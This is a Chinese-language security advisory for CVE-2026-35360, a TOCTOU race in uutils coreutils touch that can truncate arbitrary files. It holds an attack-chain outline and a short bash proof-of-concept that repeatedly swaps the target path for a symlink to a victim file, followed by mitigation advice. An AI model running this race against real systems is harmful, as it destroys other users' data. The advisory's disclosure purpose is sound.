CVE-2026-35360 CVSS 6.3 中危

CVE-2026-35360 uutils coreutils TOCTOU竞态漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35360

漏洞类型

TOCTOU竞争条件

CVSS评分

6.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

uutils coreutils

漏洞概述

uutils coreutils中的touch工具存在TOCTOU竞争条件漏洞。在文件创建过程中，当工具检测到路径不存在时，攻击者可利用检测与创建之间的时间窗口，通过创建文件或切换符号链接，导致touch工具截断现有文件，造成永久数据丢失。

技术细节

该漏洞源于uutils coreutils中touch实用程序的实现逻辑缺陷。具体而言，当touch尝试创建一个不存在的文件时，首先会检查路径是否存在。若不存在，随后调用Rust标准库的File::create()函数进行创建。然而，File::create()内部使用了O_TRUNC标志，这意味着如果文件已存在，其内容将被清空。在检查和实际创建之间存在一个竞态窗口。攻击者可利用此窗口，在touch检查通过但尚未执行创建操作时，迅速在目标路径创建一个符号链接指向任意文件（如系统关键配置文件），或将普通文件替换为链接。最终导致touch操作意外截断并清空目标文件，造成高完整性影响和高可用性影响。

攻击链分析

STEP 1

侦察与准备

攻击者识别系统中正在使用uutils coreutils的touch工具，并找到一个可写入的目录或监控touch命令的执行。

STEP 2

触发竞态

攻击者等待或诱导touch命令尝试创建一个当前不存在的文件。

STEP 3

利用时间窗口

在touch检查路径不存在（Time-of-Check）与实际调用File::create()（Time-of-Use）之间的极短时间窗口内，攻击者将目标路径替换为指向敏感文件的符号链接。

STEP 4

数据破坏

touch命令以O_TRUNC标志打开攻击者提供的链接，导致原始敏感文件被截断（内容清空），实现数据破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-35360 TOCTOU in uutils touch
# This script attempts to win the race condition by swapping a file
# with a symlink to a target file between the check and use.

TARGET="target_file"
IMPORTANT_FILE="important_data.txt"

# Setup: Create the important file
echo "Critical Data" > $IMPORTANT_FILE

echo "Starting exploitation attempt..."

# Loop to increase chances of hitting the race window
while true; do
    # Clean up
    rm -f $TARGET
    
    # Start uutils touch in background (Victim)
    # Note: Requires precise timing to hit the gap between check and create
    touch $TARGET &
    PID=$!
    
    # Attack: Swap target with a symlink to the important file
    # This must happen after touch checks for existence but before File::create
    rm -f $TARGET
    ln -s $(pwd)/$IMPORTANT_FILE $TARGET
    
    # Wait for touch to finish
    wait $PID
    
    # Check if exploitation succeeded (file truncated)
    if [ ! -s $IMPORTANT_FILE ]; then
        echo "[+] Exploitation successful: $IMPORTANT_FILE has been truncated!"
        break
    fi
    
    # Restore important file for next attempt
    echo "Critical Data" > $IMPORTANT_FILE
done

影响范围

uutils coreutils (Issue #10019修复前)

防御指南

临时缓解措施

建议在修复补丁发布前，避免在多用户环境或不可信目录下使用uutils touch创建文件。系统管理员应监控文件系统的异常截断行为，并考虑使用文件锁机制作为临时防御手段。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35360
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35360
3 Details https://www.cvedetails.com/cve/CVE-2026-35360/
4 VulDB https://vuldb.com/cve/CVE-2026-35360
5 Link https://github.com/uutils/coreutils/issues/10019
6 Link https://github.com/uutils/coreutils/issues/10019

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表